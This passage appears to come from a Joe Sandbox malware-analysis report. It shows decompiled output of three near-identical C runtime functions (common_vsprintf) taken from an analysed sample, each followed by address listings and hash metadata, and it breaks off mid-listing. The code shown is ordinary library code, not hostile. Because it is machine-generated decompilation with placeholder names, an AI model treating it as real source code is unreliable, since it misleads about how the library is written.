					_t171 = L00994930(_t239, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t234 = _t234 + 0x18;
					if(_t171 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L12:
						_v1152 = 1;
						L13:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t168 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t234 = _t234 + 0x18;
							__eflags = _t168 - 1;
							if(_t168 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00976CC0(_t172,  &_v1224, _t229, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L21:
								_v1160 = 1;
								L22:
								_v1128 = _v1160;
								_t135 = E00977A60( &_v1224);
								E00976BB0( &_v1120, E00976CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
								_v1124 = E0097B870(_t172,  &_v1120, _t228, _t229);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_t221 = _a4 & 0x00000002;
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
													L48:
													_t221 = _v1124;
													_v1184 = _v1124;
													E009770D0( &_v1120);
													E00977230( &_v1224);
													_t147 = _v1184;
													goto L49;
												}
												_t221 = 0;
												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												_v1180 = 0xfffffffe;
												E009770D0( &_v1120);
												E00977230( &_v1224);
												_t147 = _v1180;
												goto L49;
											}
											_v1176 = 0xffffffff;
											E009770D0( &_v1120);
											E00977230( &_v1224);
											_t147 = _v1176;
											goto L49;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
												} else {
													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												}
											} else {
												 *_a12 = 0;
											}
										}
										goto L48;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L28:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L33:
												goto L48;
											}
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L33;
											}
											_v1172 = 0xffffffff;
											E009770D0( &_v1120);
											E00977230( &_v1224);
											_t147 = _v1172;
											goto L49;
										}
										 *((short*)(_a12 + _v1132 * 2)) = 0;
										goto L33;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L28;
									}
									_v1168 = 0xffffffff;
									E009770D0( &_v1120);
									E00977230( &_v1224);
									_t147 = _v1168;
									goto L49;
								}
								_t221 = _v1124;
								_v1164 = _v1124;
								E009770D0( &_v1120);
								E00977230( &_v1224);
								_t147 = _v1164;
								goto L49;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L21;
							}
							_v1160 = 0;
							goto L22;
						} else {
							 *((intOrPtr*)(L00992F70(_t173))) = 0x16;
							_t147 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							goto L49;
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L12;
					}
					_v1152 = 0;
					goto L13;
				} else {
					 *((intOrPtr*)(L00992F70(_t173))) = 0x16;
					_t147 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
					L49:
					return E00957280(_t147, _t172, _v8 ^ _t231, _t221, _t228, _t229);
				}
			}








































                      0x0096d580
                      0x0096d580
                      0x0096d580
                      0x0096d580
                      0x0096d583
                      0x0096d585
                      0x0096d58b
                      0x0096d592
                      0x0096d599
                      0x0096d5a7
                      0x0096d59b
                      0x0096d59b
                      0x0096d59b
                      0x0096d5b7
                      0x0096d5bd
                      0x0096d5c4
                      0x0096d5de
                      0x0096d5e3
                      0x0096d5e9
                      0x0096d5eb
                      0x0096d5eb
                      0x0096d5e9
                      0x0096d5f3
                      0x0096d626
                      0x0096d62a
                      0x0096d63e
                      0x0096d63e
                      0x0096d648
                      0x0096d64e
                      0x0096d654
                      0x0096d65b
                      0x0096d675
                      0x0096d67a
                      0x0096d67d
                      0x0096d680
                      0x0096d682
                      0x0096d682
                      0x0096d680
                      0x0096d683
                      0x0096d68a
                      0x0096d6c7
                      0x0096d6ce
                      0x0096d6d4
                      0x0096d6da
                      0x0096d6e0
                      0x0096d6e9
                      0x0096d6f2
                      0x0096d6f8
                      0x0096d70e
                      0x0096d714
                      0x0096d720
                      0x0096d726
                      0x0096d73a
                      0x0096d73a
                      0x0096d744
                      0x0096d74a
                      0x0096d75a
                      0x0096d785
                      0x0096d795
                      0x0096d79b
                      0x0096d79f
                      0x0096d7da
                      0x0096d7e0
                      0x0096d7ec
                      0x0096d7f2
                      0x0096d897
                      0x0096d8a0
                      0x0096d8a6
                      0x0096d8b2
                      0x0096d8b8
                      0x0096d90c
                      0x0096d910
                      0x0096d942
                      0x0096d945
                      0x0096d97e
                      0x0096d989
                      0x0096d98d
                      0x0096d98d
                      0x0096d993
                      0x0096d99f
                      0x0096d9aa
                      0x0096d9af
                      0x00000000
                      0x0096d9af
                      0x0096d947
                      0x0096d94f
                      0x0096d954
                      0x0096d964
                      0x0096d96f
                      0x0096d974
                      0x00000000
                      0x0096d974
                      0x0096d912
                      0x0096d922
                      0x0096d92d
                      0x0096d932
                      0x00000000
                      0x0096d932
                      0x0096d8ba
                      0x0096d8be
                      0x0096d8c2
                      0x0096d8c9
                      0x0096d8e4
                      0x0096d8e7
                      0x0096d8f8
                      0x0096d903
                      0x0096d8e9
                      0x0096d8f1
                      0x0096d8f1
                      0x0096d8cb
                      0x0096d8d8
                      0x0096d8d8
                      0x0096d8c9
                      0x00000000
                      0x0096d907
                      0x0096d7f8
                      0x0096d7fc
                      0x0096d834
                      0x0096d83a
                      0x0096d83d
                      0x0096d850
                      0x0096d857
                      0x0096d88f
                      0x00000000
                      0x0096d88f
                      0x0096d85f
                      0x0096d862
                      0x00000000
                      0x00000000
                      0x0096d864
                      0x0096d874
                      0x0096d87f
                      0x0096d884
                      0x00000000
                      0x0096d884
                      0x0096d84a
                      0x00000000
                      0x0096d84a
                      0x0096d7fe
                      0x0096d805
                      0x00000000
                      0x00000000
                      0x0096d807
                      0x0096d817
                      0x0096d822
                      0x0096d827
                      0x00000000
                      0x0096d827
                      0x0096d7a1
                      0x0096d7a7
                      0x0096d7b3
                      0x0096d7be
                      0x0096d7c3
                      0x00000000
                      0x0096d7c3
                      0x0096d728
                      0x0096d72c
                      0x00000000
                      0x00000000
                      0x0096d72e
                      0x00000000
                      0x0096d68c
                      0x0096d691
                      0x0096d6b5
                      0x00000000
                      0x0096d6b5
                      0x0096d68a
                      0x0096d62c
                      0x0096d630
                      0x00000000
                      0x00000000
                      0x0096d632
                      0x00000000
                      0x0096d5f5
                      0x0096d5fa
                      0x0096d61e
                      0x0096d9b5
                      0x0096d9c2
                      0x0096d9c2

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096D779
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 10a81fb5ff22bcb871d5f51474c600889a82d68f027f05682fc01f21e9186602
                      • Instruction ID: e0cd8076391816d6c1fdc575919ede59d88c1fdca7709564f659bc72dfc21636
                      • Opcode Fuzzy Hash: 10a81fb5ff22bcb871d5f51474c600889a82d68f027f05682fc01f21e9186602
                      • Instruction Fuzzy Hash: 3DC13DB0E062188BDB24DF14CC42BAEB3B4BF85314F1081D9E56D67291DB709E84CF6A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096D150 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E0096D150(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				char _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t117;
				void* _t125;
				signed int _t138;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t210;
				void* _t211;
				signed int _t215;
				void* _t216;

				_t211 = __esi;
				_t210 = __edi;
				_t160 = __ecx;
				_t159 = __ebx;
				_t213 = _t215;
				_t216 = _t215 - 0x4c8;
				_t117 =  *0xa0600c; // 0x5d529087
				_v8 = _t117 ^ _t215;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t221 = _v1148;
				if(_v1148 == 0) {
					_t158 = L00994930(_t221, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t216 = _t216 + 0x18;
					if(_t158 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L12:
						_v1152 = 1;
						L13:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t155 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t216 = _t216 + 0x18;
							__eflags = _t155 - 1;
							if(_t155 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00976CC0(_t159,  &_v1224, _t211, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L21:
								_v1160 = 1;
								L22:
								_v1128 = _v1160;
								_t125 = E00977A60( &_v1224);
								E00976A90( &_v1120, E00976C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
								_v1124 = E0097A850( &_v1120);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										_t207 = _v1208 | _v1204;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
													L48:
													_v1184 = _v1124;
													E00977010( &_v1120);
													E00977230( &_v1224);
													_t138 = _v1184;
													goto L49;
												}
												 *((char*)(_a12 + _a16 - 1)) = 0;
												_v1180 = 0xfffffffe;
												E00977010( &_v1120);
												E00977230( &_v1224);
												_t138 = _v1180;
												goto L49;
											}
											_v1176 = 0xffffffff;
											E00977010( &_v1120);
											E00977230( &_v1224);
											_t138 = _v1176;
											goto L49;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
												} else {
													 *((char*)(_a12 + _a16 - 1)) = 0;
												}
											} else {
												_t207 = _a12;
												 *_a12 = 0;
											}
										}
										goto L48;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L28:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L33:
												goto L48;
											}
											_t207 = _v1124;
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L33;
											}
											_v1172 = 0xffffffff;
											E00977010( &_v1120);
											E00977230( &_v1224);
											_t138 = _v1172;
											goto L49;
										}
										 *(_a12 + _v1132) = 0;
										goto L33;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L28;
									}
									_v1168 = 0xffffffff;
									E00977010( &_v1120);
									E00977230( &_v1224);
									_t138 = _v1168;
									goto L49;
								}
								_t207 = _v1124;
								_v1164 = _v1124;
								E00977010( &_v1120);
								E00977230( &_v1224);
								_t138 = _v1164;
								goto L49;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L21;
							}
							_v1160 = 0;
							goto L22;
						} else {
							 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
							_t138 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							goto L49;
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L12;
					}
					_v1152 = 0;
					goto L13;
				} else {
					 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
					_t138 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
					L49:
					return E00957280(_t138, _t159, _v8 ^ _t213, _t207, _t210, _t211);
				}
			}








































                      0x0096d150
                      0x0096d150
                      0x0096d150
                      0x0096d150
                      0x0096d153
                      0x0096d155
                      0x0096d15b
                      0x0096d162
                      0x0096d169
                      0x0096d177
                      0x0096d16b
                      0x0096d16b
                      0x0096d16b
                      0x0096d187
                      0x0096d18d
                      0x0096d194
                      0x0096d1ae
                      0x0096d1b3
                      0x0096d1b9
                      0x0096d1bb
                      0x0096d1bb
                      0x0096d1b9
                      0x0096d1c3
                      0x0096d1f6
                      0x0096d1fa
                      0x0096d20e
                      0x0096d20e
                      0x0096d218
                      0x0096d21e
                      0x0096d224
                      0x0096d22b
                      0x0096d245
                      0x0096d24a
                      0x0096d24d
                      0x0096d250
                      0x0096d252
                      0x0096d252
                      0x0096d250
                      0x0096d253
                      0x0096d25a
                      0x0096d297
                      0x0096d29e
                      0x0096d2a4
                      0x0096d2aa
                      0x0096d2b0
                      0x0096d2b9
                      0x0096d2c2
                      0x0096d2c8
                      0x0096d2de
                      0x0096d2e4
                      0x0096d2f0
                      0x0096d2f6
                      0x0096d30a
                      0x0096d30a
                      0x0096d314
                      0x0096d31a
                      0x0096d32a
                      0x0096d355
                      0x0096d365
                      0x0096d36b
                      0x0096d36f
                      0x0096d3aa
                      0x0096d3b0
                      0x0096d3bc
                      0x0096d3c2
                      0x0096d46d
                      0x0096d473
                      0x0096d47f
                      0x0096d47f
                      0x0096d485
                      0x0096d4ce
                      0x0096d4d2
                      0x0096d504
                      0x0096d507
                      0x0096d540
                      0x0096d540
                      0x0096d546
                      0x0096d549
                      0x0096d54f
                      0x0096d55b
                      0x0096d566
                      0x0096d56b
                      0x00000000
                      0x0096d56b
                      0x0096d50f
                      0x0096d513
                      0x0096d523
                      0x0096d52e
                      0x0096d533
                      0x00000000
                      0x0096d533
                      0x0096d4d4
                      0x0096d4e4
                      0x0096d4ef
                      0x0096d4f4
                      0x00000000
                      0x0096d4f4
                      0x0096d487
                      0x0096d48b
                      0x0096d48f
                      0x0096d496
                      0x0096d4af
                      0x0096d4b2
                      0x0096d4c3
                      0x0096d4c3
                      0x0096d4c9
                      0x0096d4b4
                      0x0096d4ba
                      0x0096d4ba
                      0x0096d498
                      0x0096d4a0
                      0x0096d4a3
                      0x0096d4a3
                      0x0096d496
                      0x00000000
                      0x0096d4cc
                      0x0096d3c8
                      0x0096d3cc
                      0x0096d404
                      0x0096d40a
                      0x0096d40d
                      0x0096d41d
                      0x0096d424
                      0x0096d45c
                      0x00000000
                      0x0096d45c
                      0x0096d426
                      0x0096d42c
                      0x0096d42f
                      0x00000000
                      0x00000000
                      0x0096d431
                      0x0096d441
                      0x0096d44c
                      0x0096d451
                      0x00000000
                      0x0096d451
                      0x0096d418
                      0x00000000
                      0x0096d418
                      0x0096d3ce
                      0x0096d3d5
                      0x00000000
                      0x00000000
                      0x0096d3d7
                      0x0096d3e7
                      0x0096d3f2
                      0x0096d3f7
                      0x00000000
                      0x0096d3f7
                      0x0096d371
                      0x0096d377
                      0x0096d383
                      0x0096d38e
                      0x0096d393
                      0x00000000
                      0x0096d393
                      0x0096d2f8
                      0x0096d2fc
                      0x00000000
                      0x00000000
                      0x0096d2fe
                      0x00000000
                      0x0096d25c
                      0x0096d261
                      0x0096d285
                      0x00000000
                      0x0096d285
                      0x0096d25a
                      0x0096d1fc
                      0x0096d200
                      0x00000000
                      0x00000000
                      0x0096d202
                      0x00000000
                      0x0096d1c5
                      0x0096d1ca
                      0x0096d1ee
                      0x0096d571
                      0x0096d57e
                      0x0096d57e

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0096D349
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: a8b2751cbc9371cdbc0027d4b15dbe17aa0c214961a3c06402d7ae08121e1380
                      • Instruction ID: e9715b5f1d76d4202145de2c9012717821b61130e5a0c86b3e321131e302b763
                      • Opcode Fuzzy Hash: a8b2751cbc9371cdbc0027d4b15dbe17aa0c214961a3c06402d7ae08121e1380
                      • Instruction Fuzzy Hash: 45C14EB0E05218CBDB24DF14CC91B9EB7B4BB81314F1085D9E52D67292DB74AE84CF5A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096E250 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E0096E250(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				char _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t117;
				void* _t125;
				signed int _t138;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t210;
				void* _t211;
				signed int _t215;
				void* _t216;

				_t211 = __esi;
				_t210 = __edi;
				_t160 = __ecx;
				_t159 = __ebx;
				_t213 = _t215;
				_t216 = _t215 - 0x4c8;
				_t117 =  *0xa0600c; // 0x5d529087
				_v8 = _t117 ^ _t215;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t221 = _v1148;
				if(_v1148 == 0) {
					_t158 = L00994930(_t221, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t216 = _t216 + 0x18;
					if(_t158 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L12:
						_v1152 = 1;
						L13:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t155 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t216 = _t216 + 0x18;
							__eflags = _t155 - 1;
							if(_t155 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00976CC0(_t159,  &_v1224, _t211, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L21:
								_v1160 = 1;
								L22:
								_v1128 = _v1160;
								_t125 = E00977A60( &_v1224);
								E00976AF0( &_v1120, E00976C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
								_v1124 = E0097ADB0( &_v1120);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										_t207 = _v1208 | _v1204;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
													L48:
													_v1184 = _v1124;
													E00977050( &_v1120);
													E00977230( &_v1224);
													_t138 = _v1184;
													goto L49;
												}
												 *((char*)(_a12 + _a16 - 1)) = 0;
												_v1180 = 0xfffffffe;
												E00977050( &_v1120);
												E00977230( &_v1224);
												_t138 = _v1180;
												goto L49;
											}
											_v1176 = 0xffffffff;
											E00977050( &_v1120);
											E00977230( &_v1224);
											_t138 = _v1176;
											goto L49;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
												} else {
													 *((char*)(_a12 + _a16 - 1)) = 0;
												}
											} else {
												_t207 = _a12;
												 *_a12 = 0;
											}
										}
										goto L48;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L28:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L33:
												goto L48;
											}
											_t207 = _v1124;
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L33;
											}
											_v1172 = 0xffffffff;
											E00977050( &_v1120);
											E00977230( &_v1224);
											_t138 = _v1172;
											goto L49;
										}
										 *(_a12 + _v1132) = 0;
										goto L33;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L28;
									}
									_v1168 = 0xffffffff;
									E00977050( &_v1120);
									E00977230( &_v1224);
									_t138 = _v1168;
									goto L49;
								}
								_t207 = _v1124;
								_v1164 = _v1124;
								E00977050( &_v1120);
								E00977230( &_v1224);
								_t138 = _v1164;
								goto L49;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L21;
							}
							_v1160 = 0;
							goto L22;
						} else {
							 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
							_t138 = E00992900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							goto L49;
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L12;
					}
					_v1152 = 0;
					goto L13;
				} else {
					 *((intOrPtr*)(L00992F70(_t160))) = 0x16;
					_t138 = E00992900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
					L49:
					return E00957280(_t138, _t159, _v8 ^ _t213, _t207, _t210, _t211);
				}
			}








































                      0x0096e250
                      0x0096e250
                      0x0096e250
                      0x0096e250
                      0x0096e253
                      0x0096e255
                      0x0096e25b
                      0x0096e262
                      0x0096e269
                      0x0096e277
                      0x0096e26b
                      0x0096e26b
                      0x0096e26b
                      0x0096e287
                      0x0096e28d
                      0x0096e294
                      0x0096e2ae
                      0x0096e2b3
                      0x0096e2b9
                      0x0096e2bb
                      0x0096e2bb
                      0x0096e2b9
                      0x0096e2c3
                      0x0096e2f6
                      0x0096e2fa
                      0x0096e30e
                      0x0096e30e
                      0x0096e318
                      0x0096e31e
                      0x0096e324
                      0x0096e32b
                      0x0096e345
                      0x0096e34a
                      0x0096e34d
                      0x0096e350
                      0x0096e352
                      0x0096e352
                      0x0096e350
                      0x0096e353
                      0x0096e35a
                      0x0096e397
                      0x0096e39e
                      0x0096e3a4
                      0x0096e3aa
                      0x0096e3b0
                      0x0096e3b9
                      0x0096e3c2
                      0x0096e3c8
                      0x0096e3de
                      0x0096e3e4
                      0x0096e3f0
                      0x0096e3f6
                      0x0096e40a
                      0x0096e40a
                      0x0096e414
                      0x0096e41a
                      0x0096e42a
                      0x0096e455
                      0x0096e465
                      0x0096e46b
                      0x0096e46f
                      0x0096e4aa
                      0x0096e4b0
                      0x0096e4bc
                      0x0096e4c2
                      0x0096e56d
                      0x0096e573
                      0x0096e57f
                      0x0096e57f
                      0x0096e585
                      0x0096e5ce
                      0x0096e5d2
                      0x0096e604
                      0x0096e607
                      0x0096e640
                      0x0096e640
                      0x0096e646
                      0x0096e649
                      0x0096e64f
                      0x0096e65b
                      0x0096e666
                      0x0096e66b
                      0x00000000
                      0x0096e66b
                      0x0096e60f
                      0x0096e613
                      0x0096e623
                      0x0096e62e
                      0x0096e633
                      0x00000000
                      0x0096e633
                      0x0096e5d4
                      0x0096e5e4
                      0x0096e5ef
                      0x0096e5f4
                      0x00000000
                      0x0096e5f4
                      0x0096e587
                      0x0096e58b
                      0x0096e58f
                      0x0096e596
                      0x0096e5af
                      0x0096e5b2
                      0x0096e5c3
                      0x0096e5c3
                      0x0096e5c9
                      0x0096e5b4
                      0x0096e5ba
                      0x0096e5ba
                      0x0096e598
                      0x0096e5a0
                      0x0096e5a3
                      0x0096e5a3
                      0x0096e596
                      0x00000000
                      0x0096e5cc
                      0x0096e4c8
                      0x0096e4cc
                      0x0096e504
                      0x0096e50a
                      0x0096e50d
                      0x0096e51d
